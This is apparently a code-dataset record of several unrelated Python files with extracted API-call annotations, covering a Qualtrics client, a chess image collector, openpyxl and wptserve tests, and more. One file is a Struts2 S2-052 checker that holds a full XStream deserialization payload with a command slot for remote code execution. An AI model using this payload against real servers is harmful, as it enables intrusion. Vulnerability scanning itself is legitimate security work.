file_content = self._download_file(download_url, file_id)
except KeyError:
raise Exception("Can't download the responses. Please check the params.")
return file_content
def _monitor_progress(self, download_url, progress_id):
progress_status = "inProgress"
while progress_status != "complete" and progress_status != "failed":
progress_response = requests.get(download_url + progress_id, headers=self.api_headers)
progress_status = progress_response.json()["result"]["status"]
return progress_response.json()["result"]["fileId"]
def _download_file(self, download_url, file_id):
file_url = f"{download_url}/{file_id}/file"
file_response = requests.get(file_url, headers=self.api_headers, stream=True)
return file_response.content
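# A hypothetical usage sketch (an assumption, not part of the original module): the token and
# library ID are placeholders, while the data/brand center values follow the commented-out
# examples at the top of the file.
if __name__ == "__main__":
    qt = QualtricsTool(api_token="YOUR-API-TOKEN",
                       data_center="iad1",
                       brand_center="mdanderson.co1")
    uploaded = qt.upload_images_api(local_image_folder="images",
                                    library_id="UR_XXXXXXXXXXXXXXX",
                                    qualtrics_folder="Uploaded Graphics",
                                    filename_pattern="*.png")
    print(uploaded)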
| [
"requests.post",
"pathlib.Path",
"requests_toolbelt.multipart.encoder.MultipartEncoder",
"requests.get",
"requests.delete"
]
| [((4027, 4066), 'requests_toolbelt.multipart.encoder.MultipartEncoder', 'MultipartEncoder', ([], {'fields': 'encoded_fields'}), '(fields=encoded_fields)\n', (4043, 4066), False, 'from requests_toolbelt.multipart.encoder import MultipartEncoder\n'), ((4090, 4207), 'requests.post', 'requests.post', (['upload_url'], {'data': 'mp_encoder', 'headers': "{'Content-Type': mp_encoder.content_type, **self.api_headers}"}), "(upload_url, data=mp_encoder, headers={'Content-Type':\n mp_encoder.content_type, **self.api_headers})\n", (4103, 4207), False, 'import requests\n'), ((5865, 5980), 'requests.post', 'requests.post', (['upload_url'], {'json': 'template_json', 'headers': "{**self.api_headers, 'content-type': 'application/json'}"}), "(upload_url, json=template_json, headers={**self.api_headers,\n 'content-type': 'application/json'})\n", (5878, 5980), False, 'import requests\n'), ((6555, 6608), 'requests.delete', 'requests.delete', (['delete_url'], {'headers': 'self.api_headers'}), '(delete_url, headers=self.api_headers)\n', (6570, 6608), False, 'import requests\n'), ((7225, 7346), 'requests.post', 'requests.post', (['download_url'], {'data': 'download_payload', 'headers': "{**self.api_headers, 'content-type': 'application/json'}"}), "(download_url, data=download_payload, headers={**self.\n api_headers, 'content-type': 'application/json'})\n", (7238, 7346), False, 'import requests\n'), ((8306, 8367), 'requests.get', 'requests.get', (['file_url'], {'headers': 'self.api_headers', 'stream': '(True)'}), '(file_url, headers=self.api_headers, stream=True)\n', (8318, 8367), False, 'import requests\n'), ((5147, 5193), 'requests.delete', 'requests.delete', (['url'], {'headers': 'self.api_headers'}), '(url, headers=self.api_headers)\n', (5162, 5193), False, 'import requests\n'), ((7970, 8036), 'requests.get', 'requests.get', (['(download_url + progress_id)'], {'headers': 'self.api_headers'}), '(download_url + progress_id, headers=self.api_headers)\n', (7982, 8036), False, 'import requests\n'), ((2031, 2055), 'pathlib.Path', 'Path', (['local_image_folder'], {}), '(local_image_folder)\n', (2035, 2055), False, 'from pathlib import Path\n'), ((2104, 2114), 'pathlib.Path', 'Path', (['file'], {}), '(file)\n', (2108, 2114), False, 'from pathlib import Path\n')] |
#!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.encode import base64encode
from app.lib.utils.common import get_capta, get_useragent
class S2_052_BaseVerify:
def __init__(self, url):
self.info = {
            'name': 'S2-052 vulnerability, also known as CVE-2017-9805',
'description': 'Struts2 Remote Code Execution Vulnerability, Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12',
'date': '2017-09-05',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.capta = get_capta()
self.headers = {
'User-Agent': get_useragent(),
'Content-Type': "application/xml",
}
self.payload ='''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{cmd}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
def check(self):
"""
        Check whether the target is vulnerable
        :param:
        :return bool True or False: whether the vulnerability exists
"""
try:
self.check_payload = self.payload.format(cmd = '<string>calc</string>')
check_req = request.post(self.url, headers = self.headers, data = self.check_payload)
if check_req.status_code == 500 and 'java.security.Provider$Service' in check_req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
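# Usage note (an assumption, not in the original): the verifier instantiated below is
# typically exercised by calling its check() method, e.g. print(S2_052.check()).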
if __name__ == "__main__":
    S2_052 = S2_052_BaseVerify('http://127.0.0.1:8088/struts2_rest_showcase_war_exploded/orders/3')
| [
"app.lib.utils.common.get_capta",
"app.lib.utils.request.request.post",
"app.lib.utils.common.get_useragent"
]
| [((700, 711), 'app.lib.utils.common.get_capta', 'get_capta', ([], {}), '()\n', (709, 711), False, 'from app.lib.utils.common import get_capta, get_useragent\n'), ((772, 787), 'app.lib.utils.common.get_useragent', 'get_useragent', ([], {}), '()\n', (785, 787), False, 'from app.lib.utils.common import get_capta, get_useragent\n'), ((4668, 4737), 'app.lib.utils.request.request.post', 'request.post', (['self.url'], {'headers': 'self.headers', 'data': 'self.check_payload'}), '(self.url, headers=self.headers, data=self.check_payload)\n', (4680, 4737), False, 'from app.lib.utils.request import request\n')] |
import setuptools
from hugdatafast.__init__ import __version__
with open("README.md", "r") as fh:
long_description = fh.read()
REQUIRED_PKGS = [
'fastai>=2.0.8',
    'fastcore>=1.0.1', # change of store_attr api
'datasets',
]
setuptools.setup(
name="hugdatafast",
version=__version__,
author="<NAME>",
author_email="<EMAIL>",
description="The elegant bridge between hugginface data and fastai",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/richarddwang/hugdatafast",
license='Apache 2.0',
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
python_requires='>=3.6',
install_requires=REQUIRED_PKGS,
keywords='datasets machine learning datasets metrics fastai huggingface',
)
| [
"setuptools.find_packages"
]
| [((615, 641), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (639, 641), False, 'import setuptools\n')] |
import pytest
from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError
from leapp.exceptions import UnsupportedDefinitionKindError
from leapp.repository import DefinitionKind
from helpers import repository_dir
import logging
import mock
_FAKE_META_DATA = {
'description': 'Fake Description',
'class_name': 'FakeActor',
'name': 'fake-actor',
'path': 'actors/test',
'tags': (),
'consumes': (),
'produces': (),
'dialogs': (),
}
def test_actor_definition(repository_dir):
with repository_dir.as_cwd():
logger = logging.getLogger('leapp.actor.test')
with mock.patch.object(logger, 'log') as log_mock:
definition = ActorDefinition('actors/test', '.', log=log_mock)
for kind in set(DefinitionKind.REPO_WHITELIST + DefinitionKind.ACTOR_WHITELIST):
if kind in DefinitionKind.ACTOR_WHITELIST:
definition.add(kind, '.')
else:
with pytest.raises(UnsupportedDefinitionKindError):
definition.add(kind, '.')
log_mock.error.assert_called_with(
"Attempt to add item type %s to actor that is not supported", kind.name)
log_mock.reset_mock()
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True]):
definition._module = True
assert definition.consumes == _FAKE_META_DATA['consumes']
assert definition.produces == _FAKE_META_DATA['produces']
assert definition.tags == _FAKE_META_DATA['tags']
assert definition.class_name == _FAKE_META_DATA['class_name']
assert definition.dialogs == _FAKE_META_DATA['dialogs']
assert definition.name == _FAKE_META_DATA['name']
assert definition.description == _FAKE_META_DATA['description']
dumped = definition.dump()
assert dumped.pop('path') == _FAKE_META_DATA['path']
assert dumped.pop('name') == definition.name
assert dumped.pop('files') == ('.',)
assert dumped.pop('libraries') == ('.',)
assert dumped.pop('tests') == ('.',)
assert dumped.pop('tools') == ('.',)
# Assert to ensure we covered all keys
assert not dumped
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[]):
definition._discovery = None
definition.discover()
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors') as mocked_actors:
mocked_actors.side_effect = RuntimeError('Test error')
definition._discovery = None
definition.discover()
with pytest.raises(MultipleActorsError):
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True, True]):
definition._discovery = None
definition.discover()
| [
"logging.getLogger",
"mock.patch",
"leapp.repository.actor_definition.ActorDefinition",
"mock.patch.object",
"pytest.raises",
"helpers.repository_dir.as_cwd"
]
| [((567, 590), 'helpers.repository_dir.as_cwd', 'repository_dir.as_cwd', ([], {}), '()\n', (588, 590), False, 'from helpers import repository_dir\n'), ((609, 646), 'logging.getLogger', 'logging.getLogger', (['"""leapp.actor.test"""'], {}), "('leapp.actor.test')\n", (626, 646), False, 'import logging\n'), ((660, 692), 'mock.patch.object', 'mock.patch.object', (['logger', '"""log"""'], {}), "(logger, 'log')\n", (677, 692), False, 'import mock\n'), ((731, 780), 'leapp.repository.actor_definition.ActorDefinition', 'ActorDefinition', (['"""actors/test"""', '"""."""'], {'log': 'log_mock'}), "('actors/test', '.', log=log_mock)\n", (746, 780), False, 'from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError\n'), ((1334, 1434), 'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actor_metadata"""'], {'return_value': '_FAKE_META_DATA'}), "('leapp.repository.actor_definition.get_actor_metadata',\n return_value=_FAKE_META_DATA)\n", (1344, 1434), False, 'import mock\n'), ((2650, 2691), 'pytest.raises', 'pytest.raises', (['ActorInspectionFailedError'], {}), '(ActorInspectionFailedError)\n', (2663, 2691), False, 'import pytest\n'), ((2900, 2941), 'pytest.raises', 'pytest.raises', (['ActorInspectionFailedError'], {}), '(ActorInspectionFailedError)\n', (2913, 2941), False, 'import pytest\n'), ((3225, 3259), 'pytest.raises', 'pytest.raises', (['MultipleActorsError'], {}), '(MultipleActorsError)\n', (3238, 3259), False, 'import pytest\n'), ((1453, 1532), 'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actors"""'], {'return_value': '[True]'}), "('leapp.repository.actor_definition.get_actors', return_value=[True])\n", (1463, 1532), False, 'import mock\n'), ((2714, 2789), 'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actors"""'], {'return_value': '[]'}), "('leapp.repository.actor_definition.get_actors', return_value=[])\n", (2724, 2789), False, 'import mock\n'), ((2964, 3022), 'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actors"""'], {}), "('leapp.repository.actor_definition.get_actors')\n", (2974, 3022), False, 'import mock\n'), ((3282, 3382), 'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actor_metadata"""'], {'return_value': '_FAKE_META_DATA'}), "('leapp.repository.actor_definition.get_actor_metadata',\n return_value=_FAKE_META_DATA)\n", (3292, 3382), False, 'import mock\n'), ((1026, 1071), 'pytest.raises', 'pytest.raises', (['UnsupportedDefinitionKindError'], {}), '(UnsupportedDefinitionKindError)\n', (1039, 1071), False, 'import pytest\n'), ((3405, 3495), 'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actors"""'], {'return_value': '[True, True]'}), "('leapp.repository.actor_definition.get_actors', return_value=[\n True, True])\n", (3415, 3495), False, 'import mock\n')] |
import numpy as np
import math
import matplotlib.pyplot as plt
U = 5 # equivalent to E (the source voltage)
R = 2 # equivalent to R1
R2 = 3
P = 1.2
Vt = 0.026
Is = 0.000005
n = 200 # depth (number of series terms)
Vd = np.zeros(n) # series coefficients
Vl = np.zeros(n)
I1 = np.zeros(n)
I1[0] = U / R # initialization of the series
Vd[0] = Vt * math.log(1 + I1[0] / Is)
Vl[0] = P / I1[0]
def convVd(Vd, I, i): # convolution for computing Vd[i]
suma = 0
for k in range(1, i):
suma += k * Vd[k] * I[i - k]
return suma
def convVlI(Vl, I1, i): # convolution for computing Vl[i]
suma = 0
for k in range(i):
suma = suma + Vl[k] * I1[i - k]
return suma
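# Added explanatory note (not part of the original script): I1, Vd and Vl hold
# power-series coefficients. convVlI is the Cauchy product of the Vl and I1
# series, enforcing the constant-power load relation Vl * I1 = P (hence
# Vl[0] = P / I1[0] above). convVd is the analogous weighted convolution that
# appears when the diode law I = Is * (exp(Vd / Vt) - 1), whose zeroth-order
# inverse gives Vd[0] above, is expanded term by term.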
for i in range(1, n): # computation of the coefficients
I1[i] = (1 / R + 1 / R2) * (-Vd[i - 1] - Vl[i - 1])
Vd[i] = (i * Vt * I1[i] - convVd(Vd, I1, i)) / (i * (Is + I1[0]))
Vl[i] = -convVlI(Vl, I1, i) / I1[0]
If = sum(I1)
Vdf = sum(Vd)
Vlf = sum(Vl)
print('I1: ' + str(If))
print('Vd: ' + str(Vdf))
print('Vl: ' + str(Vlf))
print('P: ' + str(Vlf * If))
Vdfinal = np.zeros(n) # to see how the diode voltage evolves (partial sums)
for j in range(n):
    Vdfinal[j] = np.sum(Vd[:j + 1]) # partial sum of the first j+1 coefficients
print(Vdfinal)
| [
"numpy.sum",
"numpy.zeros",
"math.log"
]
| [((179, 190), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (187, 190), True, 'import numpy as np\n'), ((206, 217), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (214, 217), True, 'import numpy as np\n'), ((223, 234), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (231, 234), True, 'import numpy as np\n'), ((1015, 1026), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (1023, 1026), True, 'import numpy as np\n'), ((296, 320), 'math.log', 'math.log', (['(1 + I1[0] / Is)'], {}), '(1 + I1[0] / Is)\n', (304, 320), False, 'import math\n'), ((1118, 1138), 'numpy.sum', 'np.sum', (['[Vd[:j + 1]]'], {}), '([Vd[:j + 1]])\n', (1124, 1138), True, 'import numpy as np\n')] |
"""
Autonomous dataset collection of data for jetson nano
<NAME> - <EMAIL>
"""
import datasets
import json
from datasets import Board, ChessPiece, PieceColor, PieceType
from realsense_utils import RealSenseCamera
import preprocessing as pr
import cv2
import pandas as pd
import os
from os.path import isfile, join
import uuid
import numpy as np
from PIL import Image
from PIL.ExifTags import TAGS
RUN_CALIBRATION = False # Run calibration sequence or use preexisting board four corners data from config/setup.txt
BOARD_SAVE_DEST = r"board_metadata.jpeg" # Where the debug metadata board visualization image is saved (to ensure we properly set up the metadata)
TMP_DEST = "/home/spark/cv-chess/core/vision/tmp/" # Where images are temporarily saved before being uploaded to drive in a batch
LOCAL_MD_FILENAME = "local_meta.json"
LOCAL_METADATA_JSON_PATH = TMP_DEST + LOCAL_MD_FILENAME
TL = [250, 115]
BL = [250, 687]
TR = [825, 115]
BR = [825, 687]
def rotate_image(image, angle):
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)
result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)
return result
def fen_to_dict(string):
name_to_num = {
'p' : 1,
'b' : 2,
'n' : 3,
'r' : 4,
'q' : 5,
'k' : 6,
}
out = {}
letters = "ABCDEFGH"
for i in range(8):
for j in range(1,9):
out[letters[i] + str(j)] = 0
string = string.split('/')
new_string = []
for s in string:
for d in s:
if d.isnumeric():
ix = s.index(d)
for i in range(int(d)-1):
s = s[0:ix] + '1' + s[ix:]
new_string.append(s)
for i in range(8, 0, -1):
for j in range(8):
if new_string[8-i][j].isnumeric():
out[letters[j] + str(i)] = 0
else:
out[letters[j] + str(i)] = name_to_num[new_string[8-i][j].lower()]
return out
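# Hedged usage sketch (added for illustration; the FEN string below is an
# arbitrary example, not one used by the script):
def _demo_fen_to_dict():
    board = fen_to_dict("8/8/8/8/8/8/8/4K3")
    assert board["E1"] == 6  # the white king's square maps to the code for 'k'
    assert board["A8"] == 0  # empty squares map to 0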
def get_sorted_time_saved(images):
"""
    Given a list of image filenames, return the (image filename, EXIF DateTime) pairs
    sorted by the time the images were written to disk (also dumped to datetimes.json).
    Purpose: for debugging dataset
    Args:
        images (list): List of image filenames
    Returns:
        list: (filename, DateTime string) tuples sorted by save time
"""
image_dat = []
for image in images:
imtmp = Image.open(image)
tmp = imtmp.getexif()
image_dat.append(tmp)
dt = {}
for exifdata in image_dat:
idx = image_dat.index(exifdata)
# iterating over all EXIF data fields
for tag_id in exifdata:
tag = TAGS.get(tag_id, tag_id)
data = exifdata.get(tag_id)
# decode bytes
if isinstance(data, bytes):
data = data.decode()
# Add datetime field
if tag == "DateTime":
dt[images[idx]] = data
print(f"{tag:25}: {data}")
output = sorted(dt.items(), key=lambda eta: eta[1], reverse=False)
print(output)
dt = {}
for item in output:
dt[item[0]] = item[1]
with open(TMP_DEST + "datetimes.json", "w") as wr: # dump to json
json.dump(output, wr)
return output
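# Hedged illustration of the return shape (filenames and timestamps below are
# hypothetical): a list of (filename, EXIF DateTime string) tuples sorted by
# save time, e.g.
#   [("img_a.jpg", "2021:01:01 10:00:00"), ("img_b.jpg", "2021:01:01 10:05:00")]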
def del_batch_from_text_file(file):
filenames = []
with open(file, "r") as rd:
for line in rd.readlines():
# parse each line for file to delete:
commaIndex = line.index(",")
filename = line[:commaIndex]
os.remove(TMP_DEST + filename)
if __name__ == "__main__":
# Initialize camera
realsense = RealSenseCamera()
"""
# Check if calibration sequence must be run
if RUN_CALIBRATION:
realsense.calibrate_board_pos()
if realsense.get_board_corners() is None:
print("Failed to run calibration. Exiting...")
exit()
"""
"""
board_meta = Board()
# Add pieces to metadata csv
board_meta.add_pieces({
"A1":ChessPiece(PieceType.KNIGHT, PieceColor.BLUE), "A2":ChessPiece(PieceType.PAWN, PieceColor.BLUE), "A3":ChessPiece(PieceType.PAWN, PieceColor.ORANGE)
})
board_meta.display_board(dest=BOARD_SAVE_DEST)
print(f"Verify board is correct output dest={BOARD_SAVE_DEST}.\nContine [Y] or Exit [E]?")
validate = input()
if validate.upper() == "E" or validate.upper() == "N":
print("Exiting...")
realsense.stop_pipeline()
exit()
files = []
files = [f for f in os.listdir(TMP_DEST) if isfile(os.path.join(TMP_DEST, f))]
# Check to see if there is pre-existing .csv metadata to add to
if LOCAL_MD_FILENAME in files:
try:
total_metadata = pd.read_csv(LOCAL_METADATA_JSON_PATH)
except:
total_metadata = pd.DataFrame()
else:
total_metadata = pd.DataFrame()
# Loop through input
while input() != "exit":
img = realsense.capture_rgb_image() # Capture the image
img = img[105:690, 348:940, :]
img = rotate_image(img, 1.5)
files = pr.board_to_64_files(img, base_directory=TMP_DEST) # Break image up into 64 files
piece_types, piece_colors = [], []
batch_id = uuid.uuid1()
for tile in sorted(files.keys()):
temp = board_meta.get_chess_piece(tile)
if temp is None:
piece_types.append(None)
piece_colors.append(None)
else:
piece_types.append(temp.piece_type.name)
piece_colors.append(temp.piece_color.name)
tmp_meta = pd.DataFrame({
"File" : [files[file] for file in files.keys()],
"Position" : [file for file in files.keys()],
"Piece Type" : piece_types,
"Piece Color" : piece_colors,
"Batch ID" : [batch_id for i in range(len(files.keys()))]
})
frames = [total_metadata, tmp_meta]
total_metadata = pd.concat(frames) # Concatenate dataframes
print(total_metadata)
total_metadata.to_csv(path_or_buf=LOCAL_METADATA_JSON_PATH)
"""
#pr.delete_board2_64_output(base_directory=TMP_DEST)
FEN = "5P1R/1Q1RP1P1/3R1P2/QQPPK1R1/1B1K1N2/B1R2N1B/1N2B3R/2B1BN2".upper()
last_input = None
df = pd.DataFrame()
while input() != "end":
resp = input("[n] for new fen, [anything key to take an image] >")
        if resp in ("n", "new"):
            FEN = input("Enter a FEN:").upper()
img = realsense.capture_rgb_image() # Capture the image
print("Captured image")
img = img[105:690, 348:940, :]
img = rotate_image(img, 1.5)
cv2.imwrite("original.jpg", img)
# Get dict of positions
temp_dict = fen_to_dict(FEN)
tiles = pr.board_to_64_files(img, temp_dict, base_directory=TMP_DEST) # Break image up into 64 files
data_frame = pd.DataFrame(tiles)
data_frame = data_frame.transpose()
frames = [df, data_frame]
df = pd.concat(frames) # Concatenate dataframe
csv_file = df.to_csv(TMP_DEST + 'my_csv.csv', header=False, index=False)
# Close streams and end pipeline
realsense.stop_pipeline()
| [
"cv2.imwrite",
"cv2.warpAffine",
"PIL.Image.open",
"PIL.ExifTags.TAGS.get",
"numpy.array",
"preprocessing.board_to_64_files",
"pandas.DataFrame",
"cv2.getRotationMatrix2D",
"pandas.concat",
"json.dump",
"os.remove"
]
| [((1065, 1114), 'cv2.getRotationMatrix2D', 'cv2.getRotationMatrix2D', (['image_center', 'angle', '(1.0)'], {}), '(image_center, angle, 1.0)\n', (1088, 1114), False, 'import cv2\n'), ((1126, 1200), 'cv2.warpAffine', 'cv2.warpAffine', (['image', 'rot_mat', 'image.shape[1::-1]'], {'flags': 'cv2.INTER_LINEAR'}), '(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\n', (1140, 1200), False, 'import cv2\n'), ((6265, 6279), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (6277, 6279), True, 'import pandas as pd\n'), ((2290, 2307), 'PIL.Image.open', 'Image.open', (['image'], {}), '(image)\n', (2300, 2307), False, 'from PIL import Image\n'), ((3113, 3134), 'json.dump', 'json.dump', (['output', 'wr'], {}), '(output, wr)\n', (3122, 3134), False, 'import json\n'), ((6657, 6689), 'cv2.imwrite', 'cv2.imwrite', (['"""original.jpg"""', 'img'], {}), "('original.jpg', img)\n", (6668, 6689), False, 'import cv2\n'), ((6784, 6845), 'preprocessing.board_to_64_files', 'pr.board_to_64_files', (['img', 'temp_dict'], {'base_directory': 'TMP_DEST'}), '(img, temp_dict, base_directory=TMP_DEST)\n', (6804, 6845), True, 'import preprocessing as pr\n'), ((6907, 6926), 'pandas.DataFrame', 'pd.DataFrame', (['tiles'], {}), '(tiles)\n', (6919, 6926), True, 'import pandas as pd\n'), ((7027, 7044), 'pandas.concat', 'pd.concat', (['frames'], {}), '(frames)\n', (7036, 7044), True, 'import pandas as pd\n'), ((1019, 1047), 'numpy.array', 'np.array', (['image.shape[1::-1]'], {}), '(image.shape[1::-1])\n', (1027, 1047), True, 'import numpy as np\n'), ((2547, 2571), 'PIL.ExifTags.TAGS.get', 'TAGS.get', (['tag_id', 'tag_id'], {}), '(tag_id, tag_id)\n', (2555, 2571), False, 'from PIL.ExifTags import TAGS\n'), ((3421, 3451), 'os.remove', 'os.remove', (['(TMP_DEST + filename)'], {}), '(TMP_DEST + filename)\n', (3430, 3451), False, 'import os\n')] |
from __future__ import absolute_import
# Copyright (c) 2010-2017 openpyxl
import pytest
from openpyxl.xml.functions import fromstring, tostring
from openpyxl.tests.helper import compare_xml
@pytest.fixture
def GradientFillProperties():
from ..fill import GradientFillProperties
return GradientFillProperties
class TestGradientFillProperties:
def test_ctor(self, GradientFillProperties):
fill = GradientFillProperties()
xml = tostring(fill.to_tree())
expected = """
<gradFill></gradFill>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, GradientFillProperties):
src = """
<gradFill></gradFill>
"""
node = fromstring(src)
fill = GradientFillProperties.from_tree(node)
assert fill == GradientFillProperties()
@pytest.fixture
def Transform2D():
from ..shapes import Transform2D
return Transform2D
class TestTransform2D:
def test_ctor(self, Transform2D):
shapes = Transform2D()
xml = tostring(shapes.to_tree())
expected = """
<xfrm></xfrm>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, Transform2D):
src = """
<root />
"""
node = fromstring(src)
shapes = Transform2D.from_tree(node)
assert shapes == Transform2D()
| [
"openpyxl.tests.helper.compare_xml",
"openpyxl.xml.functions.fromstring"
]
| [((565, 591), 'openpyxl.tests.helper.compare_xml', 'compare_xml', (['xml', 'expected'], {}), '(xml, expected)\n', (576, 591), False, 'from openpyxl.tests.helper import compare_xml\n'), ((756, 771), 'openpyxl.xml.functions.fromstring', 'fromstring', (['src'], {}), '(src)\n', (766, 771), False, 'from openpyxl.xml.functions import fromstring, tostring\n'), ((1179, 1205), 'openpyxl.tests.helper.compare_xml', 'compare_xml', (['xml', 'expected'], {}), '(xml, expected)\n', (1190, 1205), False, 'from openpyxl.tests.helper import compare_xml\n'), ((1346, 1361), 'openpyxl.xml.functions.fromstring', 'fromstring', (['src'], {}), '(src)\n', (1356, 1361), False, 'from openpyxl.xml.functions import fromstring, tostring\n')] |
import os
import unittest
import json
import types
from http.client import BadStatusLine
from io import BytesIO
import pytest
wptserve = pytest.importorskip("wptserve")
from .base import TestUsingServer, TestUsingH2Server, doc_root
def send_body_as_header(self):
if self._response.add_required_headers:
self.write_default_headers()
self.write("X-Body: ")
self._headers_complete = True
class TestResponse(TestUsingServer):
def test_head_without_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_without_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("", resp.info()['x-body'])
def test_head_with_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.send_body_for_head_request = True
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_with_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("body", resp.info()['X-Body'])
def test_write_content_no_status_no_header(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_header", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_status(201)
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 201
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_status(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert sorted(x.lower() for x in resp.info().keys()) == sorted(['test-header', 'date', 'server', 'content-length'])
def test_write_content_no_status_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == [('test-header', 'test-value')]
def test_write_content_no_status_no_headers_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_headers_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == []
def test_write_raw_content(self):
resp_content = b"HTTP/1.1 202 Giraffe\n" \
b"X-TEST: PASS\n" \
b"Content-Length: 7\n\n" \
b"Content"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_content_file(self):
@wptserve.handlers.handler
def handler(request, response):
with open(os.path.join(doc_root, "test.asis"), 'rb') as infile:
